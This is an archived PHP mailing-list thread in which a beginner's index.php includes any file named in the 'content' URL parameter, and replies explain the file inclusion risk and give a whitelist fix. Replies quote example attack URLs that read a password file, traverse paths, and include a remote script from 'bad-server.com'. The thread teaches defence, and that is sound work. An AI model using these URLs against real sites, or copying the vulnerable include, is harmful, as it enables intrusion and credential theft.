Re: [PHP] Dynamic PHP links

[Richard Lynch]

Eduard Grigoryan wrote:
 Hi,

 I'm new to PHP and I'd appreciate your advice a lot.
 I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna
 use something like
 this:
 File index.php:
 ?
 a href=index.php?content=story.htmstory/abr
 a href=index.php?content=about.htmabout/abr
 ?
 if(isset($content)):
 include $content;
 else:
 include about.htm;
 endif;
 ?

 But a guy told me it is not preferable to use this method because of
 security considerations.
 I'm sure there is a common way of building dynamic links; am I on wrong
 way?

Now that you (hopefully) understand the problem, here's a solution for
THIS case:

?php
if (!isset($content)) $content = 'about.htm';
switch($content){
  case 'about.htm':
  case 'story.htm':
include $content;
  break;
  default:
die(Page not found);
  break;
}

You'll need to add one line for each page, but you will never accidentally
try to include a file you didn't mean to include.


-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Dynamic PHP links

[Eduard Grigoryan]

Hi,

I'm new to PHP and I'd appreciate your advice a lot.
I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna use 
something like
this:
File index.php:
?
a href=index.php?content=story.htmstory/abr
a href=index.php?content=about.htmabout/abr
?
if(isset($content)):
include $content;
else:
include about.htm;
endif;
?

But a guy told me it is not preferable to use this method because of security 
considerations.
I'm sure there is a common way of building dynamic links; am I on wrong way?

Any help would be appreciated.

Thank you in advance



Best regards,
Eduard Grigoryan

*
Armenian Freenet Catalog
http://freenet.am/~edik_g
http://armfn.net/~edik_g

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Dynamic PHP links

[Ryan A]

Hey,

The reason your pal warned you against that approach is, someone could screw
with your url with something like this:

index.php?content=/etc/httpd/.dbmpasswd

which would include that file if it exists...its a security problem, be
careful and know EXACTLY what you are including/requiring.

-Ryan

On 2/12/2005 10:33:10 AM, Eduard Grigoryan ([EMAIL PROTECTED]) wrote:
 Hi,



 I'm new to PHP and I'd appreciate your advice a lot.

 I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna
 use something like

 this:

 File index.php:

 ?

 a href=index.php?content=story.htmstory/abr

 a href=index.php?content=about.htmabout/abr

 ?

 if(isset($content)):

 include $content;

 else:

 include about.htm;

 endif;

 ?



 But a guy told me it is not preferable to use this method because of
 security considerations.

 I'm sure there is a common way of building dynamic links; am I on wrong
way?

 Any help would be appreciated.

 Thank you in advance



 Best regards,
 Eduard Grigoryan

 *
 Armenian Freenet Catalog
 http://freenet.am/~edik_g
 http://armfn.net/~edik_g

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php



-- 
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.300 / Virus Database: 265.8.7 - Release Date: 2/10/2005

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Dynamic PHP links

[Burhan Khalid]

Eduard Grigoryan wrote:
Hi,
I'm new to PHP and I'd appreciate your advice a lot.
I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna use 
something like
this:
File index.php:
?
a href=index.php?content=story.htmstory/abr
a href=index.php?content=about.htmabout/abr
?
if(isset($content)):
include $content;
else:
include about.htm;
endif;
?
But a guy told me it is not preferable to use this method because of security 
considerations.
I'm sure there is a common way of building dynamic links; am I on wrong way?
You can search the list archives for posts regarding this topic (it 
comes up alot).

There are safer ways to do what you are doing.  One simple way to hack 
your script as written above would be to type :

index.php?content=../some/secret/file.txt
or,
index.php?content=http://www.bad-server.com/badscript.php
in the browser's address bar.
Regards,
Burhan
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Dynamic PHP

[Chris Hemmings]

Hello!

I'm sure I read this somewhere but I'm just not so sure now.  Can you
produce PHP code in a PHP page and then run it.  Kind of like this:

?php
$mycode=echo'Hello';;

# Something here to execute $mycode
?

Is the above possible??

Thanks!

Chris.




-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]

Re: [PHP] Dynamic PHP

[Pavel Jartsev]

Chris Hemmings wrote:

 Hello!
 
 I'm sure I read this somewhere but I'm just not so sure now.  Can you
 produce PHP code in a PHP page and then run it.  Kind of like this:
 
 ?php
 $mycode=echo'Hello';;
 
 # Something here to execute $mycode
 ?
 

Maybe U need this function:

http://www.php.net/manual/en/function.eval.php

-- 
Pavel a.k.a. Papi


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]